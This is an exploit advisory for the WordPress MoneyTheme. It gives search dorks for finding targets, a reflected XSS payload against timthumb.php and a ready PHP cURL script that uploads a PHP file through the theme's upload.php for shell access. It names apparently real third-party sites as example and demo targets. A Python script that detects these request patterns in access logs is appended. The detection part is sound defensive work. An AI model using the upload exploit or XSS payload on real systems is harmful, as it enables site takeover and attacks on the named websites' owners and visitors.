#Title : Wordpress MoneyTheme Themes XSS / Arbitrary File Upload
#Author : DevilScreaM
#Date : 10/27/2013
#Category : Web Applications
#Type : PHP
#Vendor : http://themesjunction.com
#Link : http://themesjunction.com/theme/money_wordpress_template-17129.html
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Vulnerability : XSS, Arbitrary File Upload
#Dork :
inurl:themes/MoneyTheme/
inurl:wp-content/themes/MoneyTheme/
Reflected Cross Site Scripting
Vulnerable at 'timthumb.php': the value of the src parameter is reflected in the response without output encoding, so markup placed before the .jpg suffix is rendered.
http://site-target/wp-content/themes/MoneyTheme/timthumb.php?src=[XSS].jpg
Example :
http://cheapcompoundbow.com/wp-content/themes/MoneyTheme/timthumb.php?src=<h1>DevilScreaM</h1>.jpg
====================================================================================================
Arbitrary File Upload
The theme's uploads/upload.php accepts whatever file is posted in the Filedata field, keeps its original name and extension, and writes it into the directory named by the attacker-controlled folder query parameter, so a .php file can be dropped under the web root and executed.
Exploit :
<?php
// Local file to upload; upload.php keeps the name and extension as-is.
$uploadfile = "devilscream.php";
// The folder parameter selects the destination directory on the target.
$ch = curl_init("http://site-target/wp-content/themes/MoneyTheme/uploads/upload.php?folder=/wp-content/themes/MoneyTheme/uploads/uploads/");
curl_setopt($ch, CURLOPT_POST, true);
// PHP >= 5.5 uses CURLFile; the legacy "@filename" syntax was removed in PHP 7.
$file = class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile";
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata' => $file));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
if ($postResult === false) {
    echo "curl error: " . curl_error($ch) . "\n";
}
curl_close($ch);
echo $postResult;
?>
Shell Access : http://site-target/wp-content/themes/MoneyTheme/uploads/uploads/devilscream.php
devilscream.php (the uploaded file; phpinfo() is only a proof of execution, any PHP payload works):
<?php
phpinfo();
?>
Demo :
http://wellontop.com/wp-content/themes/MoneyTheme/uploads/upload.php
http://copiouscash.com/wp-content/themes/MoneyTheme/uploads/upload.php
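As an added detection example (not part of the original advisory and not code from the theme vendor), the script below runs the two request patterns described above over Apache combined-format access log lines: a timthumb.php request whose src parameter carries markup, a POST to the theme's uploads/upload.php, and a later GET of a .php file from the uploads/uploads/ directory. The log lines, IP addresses and timestamps are constructed for the example; the theme path is taken from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache "combined" log lines modelled on the requests in the
# advisory. IPs, timestamps and sizes are placeholders, not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Oct/2013:10:01:02 +0000] "GET /wp-content/themes/MoneyTheme/timthumb.php?src=%3Ch1%3EDevilScreaM%3C/h1%3E.jpg HTTP/1.1" 400 512 "-" "Mozilla/5.0"
10.0.0.5 - - [27/Oct/2013:10:01:10 +0000] "POST /wp-content/themes/MoneyTheme/uploads/upload.php?folder=/wp-content/themes/MoneyTheme/uploads/uploads/ HTTP/1.1" 200 17 "-" "curl/7.32.0"
10.0.0.5 - - [27/Oct/2013:10:01:15 +0000] "GET /wp-content/themes/MoneyTheme/uploads/uploads/devilscream.php HTTP/1.1" 200 60412 "-" "Mozilla/5.0"
10.0.0.9 - - [27/Oct/2013:10:05:00 +0000] "GET /wp-content/themes/MoneyTheme/timthumb.php?src=/wp-content/uploads/2013/10/banner.jpg&w=300 HTTP/1.1" 200 21034 "-" "Mozilla/5.0"
10.0.0.9 - - [27/Oct/2013:10:05:01 +0000] "GET /wp-content/themes/MoneyTheme/uploads/uploads/photo.jpg HTTP/1.1" 200 8012 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

THEME = "/wp-content/themes/MoneyTheme"


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    return rec


def classify(rec):
    """Return a finding label for one parsed request, or None if it looks benign."""
    path, query = rec["path"], rec["query"]
    # (1) timthumb.php with markup or quotes in src: reflected XSS probe.
    if path == THEME + "/timthumb.php":
        src = unquote(query.get("src", [""])[0])
        if re.search("[<>'\"]", src):
            return "timthumb-xss-probe"
    # (2) POST to the theme's upload handler; the folder parameter is attacker-chosen.
    if rec["method"] == "POST" and path == THEME + "/uploads/upload.php":
        return "upload-handler-post"
    # (3) A .php file served from the upload directory: uploaded code being executed.
    if path.startswith(THEME + "/uploads/uploads/") and path.lower().endswith(".php"):
        return "php-in-upload-dir"
    return None


def scan(log_text):
    """Return (ip, label, path) tuples for every suspicious request in log_text."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        label = classify(rec)
        if label:
            findings.append((rec["ip"], label, rec["path"]))
    return findings


if __name__ == "__main__":
    for ip, label, path in scan(SAMPLE_LOG):
        print(f"{ip}  {label:22s}  {path}")
```

The three labels from one client IP in a short window are the full attack chain; a POST to upload.php followed by a 200 on a .php file under uploads/uploads/ is the combination worth alerting on, since a legitimate theme user never requests PHP from that directory.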